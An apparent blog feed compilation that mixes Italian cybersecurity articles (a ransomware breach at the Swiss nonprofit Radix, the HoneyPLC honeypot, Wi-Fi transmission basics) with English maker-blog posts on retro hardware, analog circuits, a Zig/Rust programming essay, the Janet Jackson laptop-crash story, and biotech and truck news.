Radix è un’organizzazione senza scopo di lucro con sede a Zurigo che promuove la salute e stili di vita sani. Gestisce otto centri di competenza che realizzano diversi progetti e servizi per conto della Confederazione, di autorità cantonali e comunali, nonché di altre organizzazioni pubbliche e private. L’organizzazione ha già rilasciato una dichiarazione ufficiale sull’attacco, affermando che il 16 giugno 2025 i suoi sistemi sono stati compromessi dagli operatori del ransomware Sarcoma.
I rappresentanti di Radix affermano di aver già informato tutti gli interessati tramite notifiche personalizzate e sottolineano che non ci sono prove che siano trapelati dati riservati delle organizzazioni partner. Il gruppo Sarcoma ha iniziato le sue attività nell’ottobre 2024 ed è rapidamente diventato uno dei più attivi nel panorama dei ransomware, con 36 aziende vittime solo nel primo mese. Uno degli attacchi più noti di Sarcoma è stato l’attacco hacker al produttore taiwanese di circuiti stampati Unimicron.
Gli aggressori hanno pubblicato i dati rubati da Radix sul loro sito di fuga di notizie darknet il 29 giugno 2025, il che indica probabilmente che i tentativi di riscatto non hanno avuto successo. Gli hacker hanno rilasciato gratuitamente un archivio da 1,3 TB contenente documenti scansionati, dati finanziari, contratti e messaggi.
Per ridurre i rischi, i rappresentanti di Radix raccomandano alle vittime di restare vigili nei prossimi mesi e di diffidare dei tentativi di phishing che potrebbero essere mirati a ottenere password, numeri di carte di credito e informazioni sull’account.
È importante sottolineare che questa è la seconda volta che un ransomware ruba dati da appaltatori del governo svizzero. Nel 2023, gli autori del ransomware Play hanno hackerato l’azienda informatica Xplain , che fornisce soluzioni tecnologiche e software a vari dipartimenti governativi, unità amministrative e persino alle forze armate del Paese. Di conseguenza, sono trapelati 6.500 file riservati del governo federale .
L'articolo Attacco ransomware a Radix: i dati governo svizzero finiscono nelle underground proviene da il blog della sicurezza informatica.
HoneyPLC: il nuovo honeypot che rivoluziona la difesa degli impianti industriali
I sistemi di controllo industriale (ICS), fondamentali per il funzionamento di infrastrutture critiche come reti elettriche, idriche e di trasporto, sono sempre più vulnerabili agli attacchi informatici. In questo contesto, l’articoloHoneyPLC: un honeypot di nuova generazione per i sistemi di controllo industriale propone un honeypot avanzato e scalabile progettato per simulare PLC reali (controllori logici programmabili) e raccogliere in maniera automatica malware, in particolare codice dannoso scritto in ladder logic, migliorando sensibilmente lo stato dell’arte nella protezione degli ICS.
A differenza degli honeypot tradizionali, HoneyPLC si distingue per tre aspetti fondamentali: elevata interattività, ampia scalabilità e capacità di inganno. È in grado di emulare fedelmente protocolli di rete industriali come TCP/IP, S7comm, SNMP e HTTP, offrendo un’interazione simile a quella di un vero PLC.
Può inoltre simulare più modelli di PLC provenienti da marchi diversi, rendendolo molto più adattabile rispetto agli honeypot precedenti, che di solito supportano solo uno o due modelli. La sua struttura modulare consente anche di creare profili personalizzati per diversi dispositivi industriali.
Uno degli aspetti più innovativi è la capacità di occultamento: HoneyPLC riesce a ingannare gli strumenti di ricognizione più comuni, come Nmap, fornendo risposte verosimili grazie alla generazione automatica di fingerprint e all’emulazione accurata dei protocolli. Inoltre, ogni interazione dell’attaccante viene tracciata e conservata nei log, con la possibilità di raccogliere in tempo reale i programmi in logica ladder iniettati nei blocchi di memoria, funzione che mancava nei precedenti honeypot ICS.
La valutazione sperimentale ha coinvolto cinque modelli di PLC reali (tra cui Siemens, Allen-Bradley e ABB) e ha dimostrato che HoneyPLC è in grado di replicare fedelmente il comportamento di ciascuno di essi. È riuscito anche a resistere alle scansioni di strumenti di ricognizione, simulando stack di rete coerenti con i dispositivi target. Inoltre, ha catturato efficacemente malware scritto in ladder logic, confermando la sua utilità come strumento di raccolta e analisi dei codici malevoli.
In conclusione, HoneyPLC rappresenta un importante passo avanti nella protezione dei sistemi industriali. Grazie alla sua capacità di scalare su più modelli di PLC, di simulare interazioni realistiche e di raccogliere malware in maniera automatizzata, costituisce un potente strumento per la ricerca sulla sicurezza degli ICS e per la creazione di contromisure sempre più efficaci contro le minacce informatiche rivolte al settore industriale.
L'articolo HoneyPLC: il nuovo honeypot che rivoluziona la difesa degli impianti industriali proviene da il blog della sicurezza informatica.
Whack-A-Disk
By now most floppy disks have been relegated to the dustbin of history, with a few exceptions for obscure industrial applications using legacy hardware and, of course, much of the world’s nuclear weapons arsenals. In fact, they’re so rare to see in the world anymore that many below a certain age don’t recognize the “save” symbol commonly used in application user interfaces. Without a use case, and with plenty of old floppies still laying around, [Rob] took a pile of them and built this Whack-a-Mole-style game.
The game has a number of floppy-disk-specific features compared to the arcade classic, though. First, there’s no mallet, so the player must push the floppy disks into the drive manually. Second, [Rob] went to somewhat exceptional lengths to customize the drives to that sometimes the disks jump out of the drive, forcing the player to grab them and put them back in to score points in the game. He did this without needing to install high-powered solenoids in the drives too. As for the game software itself, it all runs on an Amiga 600 and even includes a custom-made soundtrack for the 30-second game.
Getting the drives just right did take a number of prototypes, but after a few versions [Rob] has a working game that looks fun to play and is a clever use of aging hardware, not to mention the fact that it runs on a retro computer as well. Of course, for the true retro feel, you’ll want to make sure you find a CRT for the display somewhere, even though they’re getting harder to find now than old floppy disk drives.
youtube.com/embed/I2HWena_eXs?…
Challenge: Square a Voltage
Your design task, should you decide to accept it: given an input voltage, square it. Ok, that’s too hard since squaring 8 volts would give you 64 volts, so let’s say the output should be 10% of the square, so 8 volts in would result in 6.4V. How do you do it? [Engineering Prof.] knows how and will show you what you can do in the video below.
The circuit uses two op amps and some transistors. However, the transistors are used in a way that depends on the temperature, so it is important to use a transistor array so they are matched and will all be at the same temperature.
The math depends on the fact that the transistor response has a natural log term in it, and the property that the sum of two logs is the same as the log of the product of the numbers.
Because of the matching transistors, many of the terms in the equation cancel out. Because the transistors are current devices, the transistor circuit’s output current is the input current squared divided by the output transistor’s collector current. Then it is just a matter of converting the voltage to a current and back again using the right scaling.
There’s more to it, of course, but that’s the gist of it. You can dig into the math by watching the video. If the KCL references are fuzzy for you, here’s a refresher. Squaring a voltage would be pretty important for an analog computer.
youtube.com/embed/NBVIN0S5o_g?…
A Crypto Miner Takes the Straight and Narrow
As it stands, cryptocurrency largely seems to be a fad of the previous decade, at least as far as technology goes. During that time, many PC users couldn’t get reasonably priced graphics cards since most of them were going into these miners. In contrast, nowadays any shortages are because they’re being used to turn the Internet into an AI-fueled wasteland. But nonetheless, there is a lot of leftover mining hardware from the previous decade and unlike the modern AI tools getting crammed into everything we own, this dated hardware is actually still useful. [Zendrael] demonstrates this by turning an old mining rig into a media server.
The mining rig is essentially nothing more than a motherboard with a large number of PCI slots, each designed for a GPU. PCI slots can do many other things, though, so [Zendrael] puts a terabyte solid state drive in each but one of the PCI cards using NVMe to PCI adapters. The final slot still hosts a GPU since the computer is being converted to a media server, and this allows it to do various encodings server-side. Even with only 4 GB of memory, the machine in its new configuration is more than capable of running Debian and spinning up all of the necessary software needed for a modern media server like Jellyfin, Nextcloud, and Transmission.
With many people abandoning miners as the value of them declines over time, it’s possible to find a lot of hardware like this that’s ready to be put to work on something new and useful. Hopefully all of the GPUs and other hardware being put to use today in AI will find a similar useful future, but until then we’ll note that you don’t need super powerful hardware to run some of those models on your own.
youtube.com/embed/hWcVDUmKp5A?…
There Are Better Lego-Compatible Universal Joints Out There
Lego’s Technic line features all kinds of mechanical devices, from cogs to gears to chains and even pneumatic components. However, the vast majority of these components are made out of plastic and are only capable of toy-like levels of performance. In the competitive world of Lego YouTube, builders often push these parts to their limits, breaking them more often than you might think. To that end, [Brick Experiment Channel] has been investigating stouter Lego-compatible universal joints from a variety of third-party manufacturers.
The video starts with a simple demonstration, showing that a Lego universal joint pops apart at just 0.4 Nm of torque. It’s no surprise, given it relies on tiny plastic pins in snap-fit joints. However, this means that it’s not that hard to build a stronger universal joint to outperform the stock parts.
The video steps through a range of other options available on the market. For example, CaDA builds a universal joint using aluminium sleeves, a copper center, and steel pins to join everything together. It’s so strong that the plastic Lego axles fail long before the joint does. Tested with third-party aluminum axles, it eventually fails at 2.3 Nm of torque when the aluminum sleeve snaps. An all-steel joint from MTP goes even harder, eventually stripping out its axle mount at 4 Nm. The rest of the video goes on to explore angular performance, size, and other design features.
It’s fair to say that if you’re swapping out universal joints and axles for aluminum steel parts, you’re not really playing with Lego anymore. At the same time, it’s neat that there exists a sort of defacto standard kit for mechanical experimentation that is now being expanded upon with stronger components. Video after the break.
youtube.com/embed/g52QzQCOGbI?…
Are Service Loops a Good Idea?
Well, here’s an interesting idea: the service loop. Ever heard of it? We haven’t!
In the video, the presenter explains the service loop serves two purposes: on the one hand it may provide strain relief, but chiefly these loops are installed so there will be extra available slack in the cable if you need to rewire it some day to change the configuration of your pinout.
One major problem with the service loop may be that the single turn is enough to create an inductor which will then induce noise and cross-talk all over the place. Our rule of thumb is always to completely unroll wires and cables before using them. Do you have a theory about the benefits or problems with service loops? If you do, we’d love to hear what you think in the comments!
If you’re interested in strain relief, we’ve covered that before, and you don’t need a service loop to do it! Check out Cheap Strain Relief By Casting Hot Glue In A 3D Print and Arduino Uno Strain Relief.
youtube.com/embed/x5sw5BqUT8I?…
Thanks to [Oliver] for writing in to let us know about this intriguing and somewhat controversial idea.
C++ Encounters of the Rusty Zig Kind
There comes a time in any software developer’s life when they look at their achievements, the lines of code written and the programming languages they have relied on, before wondering whether there may be more out there. A programming language and its associated toolchains begin to feel like familiar, well-used tools after you use them for years, but that is no excuse to remain rusted in place.
While some developers like to zigzag from one language and toolset to another, others are more conservative. My own journey took me from a childhood with QuickBasic and VisualBasic to C++ with a bit of Java, PHP, JavaScript, D and others along the way. Although I have now for years focused on C++, I’m currently getting the hang of Ada in particular, both of which tickle my inner developer in different ways.
Although Java and D never quite reached their lofty promises, there are always new languages to investigate, with both Rust and Zig in particular getting a lot of attention these days. Might they be the salvation that was promised to us C-afflicted developers, and do they make you want to zigzag or ferrously oxidize?
Solving Problems
As hilarious it is to make new programming languages for the fun of it, there has to be some purpose to them if they want to be more than a gag. That’s why Whitespace and Brainf*ck are great for having some (educational) fun with, while Forth is a serious and very much commercially successful language. Meanwhile there’s still an ongoing debate about whether Python may or may not be an esoteric language, mostly on account of it granting whitespace so much relevance that would make the Whitespace developers proud.
This contrasts heavily with languages like C and consequently C++ where whitespace is not relevant and you can write everything on a single line if that’s your kink. Meanwhile in Ada, COBOL and others case sensitivity doesn’t exist, because their developers failed to see the point of adding this ‘feature’. This leads us to another distinguishing feature of languages: weakly- versus strongly-typed and super-strongly typed languages.
If one accepts that a type system is there to prevent errors, then logically the stronger the type system is, the better. This is one reason why I personally prefer TypeScript over JavaScript, why Java reflection and Objective-C messaging drove me up various walls, why my favorite scripting language is AngelScript, why I love the type system in Ada and also why I loathe whoever approved using the auto
keyword in C++ outside of templates.
With those lines marked, let’s see what problems Rust and Zig will solve for me.
Getting Ziggy
The Zig language is pretty new, having only been released in early 2016. This makes it four years younger than Rust, while also claiming to be a ‘better C’. Much of this is supposed to come from ‘improved memory safety’, which is a topic that I have addressed previously, both in the context of another ‘improved C’ language called TrapC, as well as from a security red herring point of view. Here again having a very strong type system is crucial, as this allows for the compiler as well as static and dynamic analysis tools to pick up any issues.
There is also the wrinkle that C++ is already an improved C, and the C11 standard in particular addresses a lot of undefined behavior, which makes it a pretty tall order to do better than either. Fortunately Zig claims to be a practically drop-in solution for existing C and C++ code, so it should be pretty gentle to get started with.
Unfortunately, this is the part where things rapidly fell apart for me. I had the idea to quickly put together a crude port of my ncurses-based UE1 emulator project, but the first surprise came after installing the toolchain. My default development environment on Windows is the Linux-like MSYS2 environment, with the Zig toolchain available via pacman
.
A feeling of dread began to set in while glancing at the Getting Started page, but I figured that I’d throw together a quick ncurses project based on some two-year old code that someone said had worked for them:
const std = @import("std");
const c = @cImport({
@cInclude("curses.h");
});
pub fn main() !void {
var e = c.initscr();
e = c.printw("Hello World !!!");
e = c.refresh();
e = c.getch();
e = c.endwin();
}
Despite the symbol soup and chronic fear of fully writing out English words, it’s not too hard to understand what this code is supposed to do. The @cImport()
block allows you to include C headers, which in this case allows us to import the standard ncurses header, requiring us to only link against the system ncurses library later on. What’s not inspiring much confidence is that it’s clear at this point already that Zig is a weakly-typed language, bringing back highly unwanted embedded JavaScript flashbacks.
While prodding at writing a standard Makefile to compile this code, the reality of the Zig build system began to hit. You can only use the zig
command, which requires a special build file written in Zig, so you have to compile Zig to compile Zig, instead of using Make, CMake, Ninja, meson, etc. as is typical. Worse is that Zig’s API is being changed constantly, so that the sample build.zig
code that I had copied no longer worked and had to be updated to get the following:
const std = @import("std");
pub fn build(b: *std.Build) void {
const target = b.standardTargetOptions(.{});
const optimize = b.standardOptimizeOption(.{});
const exe = b.addExecutable(.{
.name = "ncurses",
.root_source_file = b.path("main.zig"),
.target = target,
.optimize = optimize,
});
exe.linkSystemLibrary("c");
exe.linkSystemLibrary("ncurses");
b.installArtifact(exe);
}
With this change in place, I no longer got compile errors for the build file, but even after deleting the .zig-cache
folder that the toolchain creates I kept getting the same linker errors:
While I’m sure that all of this is solvable, I was looking for a solution to my problems, not to get new problems. Instead I got a lack of strong typing, an oddly verbose syntax, ever-shifting APIs, being strong-armed into giving up the build tools of one’s choosing and finally some weird linker errors that probably require constant nuking of caches as one has to already suffer through with CMake and Gradle.
It is time to zigzag out of dodge to the next language.
Rusted Expectations
As mentioned earlier, Rust is a few years older than Zig, and in addition it has seen a lot more support from developers and companies. Its vibrant community is sure to remind you of these facts at any opportunity they get, along with how Rust cures all ills. Ignoring the obvious memory safety red herring, what problems can Rust solve for us?
Following the same pattern as with Zig, we first have to set up a development environment with the Rust toolchain and the ability to use ncurses. Unlike with Zig, we apparently cannot use C (or C++) code directly, so the recommendation is to use a wrapper. From its code we can worryingly tell that it is also a weakly-typed language by the use of type inference, and the fact that the unsafe
keyword is required to cooperate with C interfaces gives even great cause for concern. Ideally you’d not do the equivalent of hammering in raw assembly when writing C either, as this bypasses so many checks.
Regardless, the task is to figure out how to use this ncurses-rs
wrapper, despite it already being EOL-ed. Rather than dealing with this ‘cargo’ remote repository utility and reliving traumatic memories of remote artefact repositories with NodeJS, Java, etc., we’ll just copy the .rs
files of the wrapper directly into the source folder of the project. It’s generally preferred to have dependencies in the source tree for security reasons unless you have some level of guarantee that the remote source will be available and always trustworthy.
Although you can use the rustc
compiler directly, it provides an extremely limited interface compared to e.g. Clang and GCC. After trying to understand and massage dependency paths for the included files (modules) for a while, the sad result is always another fresh series of errors, like:The frustrating end to trying out Rust.
At this point any enthusiasm for doing more with Rust has already rapidly oxidized and decayed into sad shards of ferrous oxide.
Workflow Expectations
Most of my exposure to Rust and Zig prior to this experience had been from a theoretical and highly academical perspective, but actually trying to use a language is when you really begin to develop feelings that tell you whether the language is something you’re interested in. In my case these feelings were for both languages primarily frustration, mixed with an urge to get away from the whole thing as soon as possible.
This contrasts heavily with my recent experiences with COBOL, which saw me working for days on code and figuring out the language, but with a feeling of almost giddy joy at grasping yet another concept or mechanism. What helped a lot here is that the COBOL toolchains are just typical GCC compilers with the whole feature set, which means that you can use them with any build system of your choice.
Even with the Ada toolchain and its multi-step process of module dependency resolving, compiling and linking you can use these tools any way you like. It’s this kind of freedom that is at least in my view an essential part of a good development environment, as it gives the developer the choice of how to integrate these into their workflow.
The workflow with Zig and Rust reminds me mostly of the harrowing struggle with Android development and its Gradle-based environment. You get similar struggles with just getting the basic thing off the ground, are always dealing with baffling errors that may or may not be related to a component that’s a few versions too old or new, and basically it’s just a gigantic waste of time.
Even ignoring whether Zig and Rust are or can become good languages, it is this complete disregard for individual workflow preferences that’s probably the most off-putting to me, and reason to avoid these ecosystems at all cost. Something which I wish I could do with Gradle as well, but I digress.
In the end I think I’ll be sticking with C++, with a bit of C and an increasing amount of Ada and Fortran on the side. Unless you’re being paid big bucks, there is no reason to put yourself through the suffering of a workflow you loathe.
DIY Book Lamp is a Different Take on the Illuminated Manuscript
People have been coming up with clever ways to bring light to the darkness since we lived in caves, so it’s no surprise we still love finding interesting ways to illuminate our world. [Michael] designed a simple, but beautiful, book lamp that’s easy to assemble yourself.
This build really outshines its origins as an assembly of conductive tape, paper, resistors, LEDs, button cells, and a binder clip. With a printable template for the circuit, this project seems perfect for a makerspace workshop or school science project kids could take home with them. [Michael] walks us through assembling the project in a quick video and even has additional information available for working with conductive tape which makes it super approachable for the beginner.
The slider switch is particularly interesting as it allows you to only turn on the light when the book is open using just conductive tape and paper. We can think of a few other ways you could control this, but they quickly start increasing the part count which makes this particularly elegant. By changing the paper used for the shade or the cover material for the book, you can put a fun spin on the project to match any aesthetic.
If you want to build something a little more complex to light your world, how about a 3D printed Shoji lamp, a color-accurate therapy lamp, or a lamp that can tell you to get back to work.
youtube.com/embed/ggw1bmISklU?…
One Laptop Manufacturer Had To Stop Janet Jackson Crashing Laptops
There are all manner of musical myths, covering tones and melodies that have effects ranging from the profound to the supernatural. The Pied Piper, for example, or the infamous “brown note.”
But what about a song that could crash your laptop just by playing it? Even better, a song that could crash nearby laptops in the vicinity, too? It’s not magic, and it’s not a trick—it was just a punchy pop song that Janet Jackson wrote back in 1989.
Rhythm Nation
As told by Microsoft’s Raymond Chen, the story begins in the early 2000s during the Windows XP era. Engineers at a certain OEM laptop manufacturer noticed something peculiar. Playing Janet Jackson’s song Rhythm Nation through laptop speakers would cause the machines to crash. Even more bizarrely, the song could crash nearby laptops that weren’t even playing the track themselves, and the effect was noted across laptops of multiple manufacturers.
youtube.com/embed/OAwaNWGLM0c?…
Rhythm Nation was a popular song from Jackson’s catalog, but nothing about it immediately stands out as a laptop killer.
After extensive testing and process of elimination, the culprit was identified as the audio frequencies within the song itself. It came down to the hardware of the early 2000s laptops in question. These machines relied on good old mechanical hard drives. Specifically, they used 2.5-inch 5,400 RPM drives with spinning platters, magnetic heads, and actuator arms.The story revolves around 5,400 RPM laptop hard drives, but the manufacturer and model are not public knowledge. No reports have been made of desktop PCs or hard disks suffering the same issue. Credit: Raimond Spekking, CC BY-SA 4.0
Unlike today’s solid-state drives, these components were particularly susceptible to physical vibration. Investigation determined that something in Rhythm Nation was hitting a resonant frequency of some component of the drive. When this occurred, the drive would be disturbed enough that read errors would stack up to the point where it would trigger a crash in the operating system. The problem wasn’t bad enough to crash the actual hard drive head into the platters themselves, which would have created major data loss. It was just bad enough to disrupt the hard drive’s ability to read properly, to the point where it could trigger a crash in the operating system.A research paper published in 2018 investigated the vibrational characteristics of a certain model of 2.5-inch laptop hard drive. It’s not conclusive evidence, and has nothing to do with the Janet Jackson case, but it provides some potentially interesting insights as to why similar hard drives failed to read when the song was played. Credit: Research paper
There was a simple workaround for this problem, that was either ingenious or egregious depending on your point of view. Allegedly, the OEM simply whipped up a notch filter for the audio subsystem to remove the offending frequencies. The filter apparently remained in place from the then-contemporary Windows XP up until at least Windows 7. At this point, Microsoft created a new rule for “Audio Processing Objects” (APO) which included things like the special notch filter. The rule stated that all of these filters must be able to be switched off if so desired by the user. However, the story goes that the manufacturer gained a special exception for some time to leave their filter APO on at all times, to prevent users disabling it and then despairing when their laptops suddenly started crashing unexpectedly during Janet Jackson playlists.
As for what made Rhythm Nation special? YouTuber Adam Neely investigated, and came up with a compelling theory. Having read a research paper on the vibrational behavior of a 2.5-inch 5,400 RPM laptop hard disk, he found that it reported the drive to have its largest vibrational peak at approximately 87.5 Hz. Meanwhile, he also found that Rhythm Nation had a great deal of energy at 84.2 Hz. Apparently, the recording had been sped up a touch after the recording process, pushing the usual low E at 82 Hz up slightly higher. The theory being that the mild uptuning in Rhythm Nation pushed parts of the song close enough to the resonant frequency of some of the hard drive’s components to give them a good old shaking, causing the read errors and eventual crashes.
It’s an interesting confluence of unintended consequences. A singular pop song from 1989 ended up crashing laptops over a decade later, leading to the implementation of an obscure and little-known audio filter. The story still has holes—nobody has ever come forward to state officially which OEM was involved, and which precise laptops and hard drives suffered this problem. That stymies hopes for further research and recreation of this peculiarity. Nevertheless, it’s a fun tech tale from the days when computers were ever so slightly more mechanical than they are today.
Move Over, Cybertruck: Series Hybrids from Edison Are on the Way
It’s been awhile since we checked in with Canada’s Edison Motors, so let’s visit [DeBoss Garage] for an update video. To recap, Edison Motors is a Canadian company building diesel-electric hybrid semi-trucks and more.The last interesting thing to happen in Donald, BC was when it burned down in the 1910s.
Well, they’ve thankfully moved out of the tent in their parents’ back yard where the prototype was built. They’ve bought themselves a company town: Donald, British Columbia, complete with a totally-not-controversial slogan “Make Donald Great Again”.
More interesting is that their commercial-off-the-shelf (COTS), right-to-repair centered approach isn’t just for semi-trucks: they’re now a certified OEM manufacturer of a rolling heavy truck chassis you can put your truck cab or RV body on, and they have partnered with three coach-builders for RVs and a goodly number of manufacturing partners for truck conversion kits. The kits were always in the plan, but selling the rolling chassis is new.
One amazingly honest take-away from the video is the lack of numbers for the pickups: top speed, shaft horsepower, torque? They know what all that should be, but unlike the typical vaporware startup, Edison won’t tell you the engineering numbers on the pickup truck kits until it has hit the race track and proved itself in the real world. These guys are gear-heads first and engineers second, so for once in a long time the adage “engineers hate mechanics” might not apply to a new vehicle.
The dirt track is the first thing under construction in Donald, so hopefully the next update we hear from Edison Motors will include those hard numbers, including pesky little things like MSRP and delivery dates. Stay tuned.
In our last post about an electric truck, a lot of you in the comments wanted something bigger, heavier duty, not pure battery, and made outside the USA. Well, here it is.
youtube.com/embed/DnmCvAZIW38?…
Thanks to [Keith Olson] for the tip. Remember, the lines are always open!
DK 9x35 - Tu gli dai il fair use e loro se lo infilano nel c...
Le sentenze Meta e Anthropic stabiliscono (per ora) che risucchiare l'intera Internet per "addestrare" le loro fottute IA non costituisce violazione del copyright. E poi arriva CreativeCommons che vuole "segnalare" come i detentori dei diritti preferiscono essere spolpati.
spreaker.com/episode/dk-9x35-t…
In Vivo CAR T Cell Generation for Cancer and Auto-Immune Treatments
With immunotherapy increasingly making it out of the lab and into hospitals as a viable way to treat serious conditions like cancer, there’s a lot of pressure to optimize these therapies. This is especially true for therapies involving chimeric antigen receptor (CAR) T cells, which so far required a cumbersome process of extracting the patient’s T cells, modifying them ex vivo and returning the now CAR T cells to the patient’s body. After a recently published study, it seems that we may see in vivo CAR T cell therapy become reality, with all the ease of getting a vaccine shot.
We covered CAR T cells previously in the context of a way to prevent T cell exhaustion and making them more effective against certain tumors. This new study (paywalled) by [Theresa L. Hunter] et al. as published in Science demonstrates performing the CAR manipulation in vivo using CD8+ T cell targeting lipid nanoparticles containing mRNA to reprogram these T cells directly.
In rodent and non-human primate studies a clear effect on tumor control was demonstrated, with for auto-immune diseases the related B cells becoming effectively depleted. Although it’s still a long way off from human trials and market approval, this research builds upon the knowledge gained from existing mRNA vaccines, raising hopes that one day auto-immune or cancer therapy could be as simple as getting a cheap, standardized shot.
Sicurezza Reti Wi-Fi: La Sfida e le Soluzioni Adattive per l’Era Digitale
La Sfida della Sicurezza nelle Reti Wi-Fi e una Soluzione Adattiva.
Nell’era della connettività pervasiva, lo standard IEEE 802.11(meglio noto come Wi-Fi ), è diventato la spina dorsale su cui si fonda la nostra vita digitale. Dalla navigazione web allo streaming, dal lavoro remoto all’automazione industriale, milioni di dispositivi si affidano ogni giorno a questa tecnologia per comunicare senza fili. Ma proprio questa ubiquità, che ne ha decretato il successo, espone anche il suo lato più critico: la sicurezza.
In un mondo in cui ogni connessione è una potenziale porta d’ingresso, proteggere le reti Wi-Fi è diventata una sfida strategica, tanto per i privati quanto per le imprese.
Le vulnerabilità del Wi-Fi: una superficie d’attacco in continua espansione
Come evidenziato nei precedenti articoli della nostra rubrica, le reti Wi-Fi continuano a soffrire di una debolezza strutturale che riguarda il controllo degli accessi, ovvero la tradizionale barriera di ingresso. Questa “porta di ingresso” passiva, espone le reti al rischio di manipolazioni da parte di attori malevoli. Gli hacker, avvalendosi di software facilmente reperibili, possono lanciare attacchi con estrema semplicità. Tra i più comuni troviamo:
- Attacchi Denial of Service (DoS): volti a sovraccaricare una rete rendendola inutilizzabile.
- Attacchi Man in the Middle (MITM): dove un hacker intercetta e manipola le comunicazioni tra due utenti.
Il problema non è solo tecnico, ma sistemico: la rapidità con cui emergono nuove tecniche di attacco rende obsolete molte delle difese tradizionali, che agiscono troppo tardi o in modo reattivo. In questo contesto, approcci statici e “passivi” non sono più sufficienti. Serve una risposta più adattiva.
La velocità con cui gli hacker sviluppano nuove tecniche rende spesso inefficaci le difese tradizionali, trasformando molti approcci in strategie passive incapaci di affrontare minacce emergenti.
Come avvengono le trasmissioni dei dati nelle reti
Per comprendere le implicazioni della trasmissione sincrona e asincrona nel Wi-Fi, è utile richiamare brevemente il funzionamento base del traffico dati su Internet.
Internet è una rete globale composta da dispositivi interconnessi che comunicano secondo i protocolli TCP/IP. Quando chiediamo l’accesso a un contenuto (ad esempio digitando redhot cyber.com) il nostro dispositivo invia una richiesta che viene instradata attraverso nodi intermedi (router, gateway, DNS) fino alla destinazione.
Ogni pacchetto è trasportato seguendo i principi del modello TCP/IP, che garantisce integrità, ordinamento e affidabilità nella comunicazione, indipendentemente dalla rete fisica utilizzata (rame, fibra o wireless).NB: Questo principio di frammentazione e indirizzamento è valido a prescindere dal tipo di trasmissione (Wi-Fi, cavo Ethernet, 5G) ed è alla base di tutte le comunicazioni digitali moderne.
Attraverso questa immagine abbiamo voluto rappresentare uno scenario tipico di rete domestica o aziendale semplificata, utile per comprendere come avviene una normale comunicazione tra un dispositivo e un sito web:
Cosa vediamo nello schema:
- Ogni dispositivo nella rete locale (PC, smartphone, stampante, ecc.) è identificato da un IP privato (es. 192.168.1.153).
Gli IP privati sono validi solo all’interno della rete locale e non sono visibili su Internet. Solitamente vengono assegnati dal router tramite DHCP. - Il router/modem agisce da “porta d’uscita” della rete e possiede un IP pubblico (es. 82.xxx.145.xxx), assegnato dal provider.
L’IP pubblico è l’indirizzo visibile all’esterno: è quello che i server web vedono e con cui comunicano quando ci connettiamo a Internet. - Quando, ad esempio, un utente digita redhotcyber.com nel browser. Entra allora in gioco il DNS (Domain Name System):
Il DNS è come una “rubrica” di Internet che traduce il nome a dominio (redhot cyber.com) nel corrispondente indirizzo IP (es. 93.184.216.34). - Una volta ottenuto l’IP del sito, il router inoltra la richiesta al server remoto attraverso l’ISP, utilizzando il suo IP pubblico.
- Quando arriva la risposta, il router, grazie al NAT (Network Address Translation), sa a quale dispositivo inoltrare la risposta all’interno della rete locale.
Più precisamente, nella maggior parte dei casi si utilizza una forma di NAT chiamata PAT (Port Address Translation). Questo meccanismo consente a più dispositivi con IP privati di condividere lo stesso IP pubblico, distinguendo ogni connessione in base alla porta di origine.
In pratica, ogni richiesta in uscita viene mappata su una porta diversa dell’IP pubblico, così il router può gestire migliaia di connessioni contemporanee anche usando un solo indirizzo esterno.
NB: Questo meccanismo è alla base di tutte le comunicazioni moderne e non, trattato all’inizio di questa rubrica, vedi articolo “Dalle Origini di Marconi alla rete senza fili” . Oggi milioni di dispositivi a livello globale si connettono trasmettendo e ricevendo dati continuamente.
I Modelli di Trasmissione: Simplex, Half-Duplex, Full-Duplex
Dopo aver visto come i dati viaggiano su Internet e nelle reti locali, è importante capire in che modo queste informazioni vengono trasmesse tra mittente e destinatario.
Ogni collegamento di rete, infatti, può avvenire secondo tre modelli principali, che differiscono per la direzione e la simultaneità della comunicazione.
Abbiamo quindi tre tipologie di trasmissione:
Simplex– Trasmissione in una sola direzione:
i dati vengono inviati in una sola direzione, dal mittente → al destinatario. Questa trasmissione utilizzata ad esempio per la tastiera e il mouse ha il vantaggio di sfruttare l’intera capacità del canale di comunicazione presentando pochissimi o addirittura nessun problema di traffico poiché i dati si spostano in una direzione.
Caratteristiche:
- Nessuna interazione possibile.
- Nessuna gestione della risposta o dell’errore.
- Larghezza di banda interamente dedicata alla trasmissione.
Half-duplex – Comunicazione alternata:
i dati si possono trasmettere in entrambe le direzioni mittente ⇋ destinatario ma non simultaneamente. Questo tipo di modalità di trasmissione dati può essere utilizzata nei casi in cui non è necessaria la comunicazione in entrambe le direzioni contemporaneamente. Può essere utilizzata per il rilevamento degli errori quando il mittente non invia o il destinatario non riceve i dati correttamente. In tali casi, i dati devono essere trasmessi nuovamente dal destinatario. (Walkie-talkie, browser internet).
I vantaggi nell’uso di questa comunicazione sono: l’ottimizzazione dell’uso del canale di comunicazione e la comunicazione bidirezionale.
Gli svantaggi invece sono quelli di non poter avere simultaneità e/o ritardi nella trasmissione
Caratteristiche:
- Comunicazione bidirezionale, ma sequenziale.
- Possibilità di gestire errori (es. ACK/NACK).
- Rischio di latenza o congestione in ambienti affollati.
Full duplex:
trasmettono dati in entrambe le direzioni mittente ⇋ destinatario ma, a differenza delle Half duplex possono essere trasmesse simultaneamente. Questa modalità è utilizzata ad esempio nelle comunicazioni telefoniche dove c’è la necessità di parlare e ascoltare simultaneamente.
Caratteristiche:
- Comunicazione continua e simultanea.
- Minore latenza e maggiore velocità.
- Ideale per ambienti interattivi e time-sensitive.
Tabella riassuntiva
Trasmissione Seriale e Parallela: Come viaggiano i bit nella rete
I Bit di dati nelle trasmissioni vengono raggruppati in due modi per essere inviati: Seriale e Parallela.
Nella trasmissione seriale i bit vengono inviati in sequenza uno dopo l’altro, questo metodo di trasmissione è utilizzata dai dispositivi per comunicare in una rete. I dispositivi di trasmissione dei dati però, al loro interno, utilizzano la trasmissione parallela, pertanto, nel punto di interfaccia tra dispositivo e linea vengono utilizzati dei convertitori, da seriale a parallelo e da parallelo a seriale.
Fonte
Nella trasmissione parallela, i dati binari sono raggruppati in bit, il numero di gruppi corrisponde al numero di thread tra mittente e destinatario, questi vengono trasmessi simultaneamente. Questo metodo consente la trasmissione di gruppi di bit più velocemente rispetto alla trasmissione seriale con la necessità di avere linee separate per ogni bit. Questo tipo di connessione è utilizzata principalmente all’ interno dei processori
Fonte
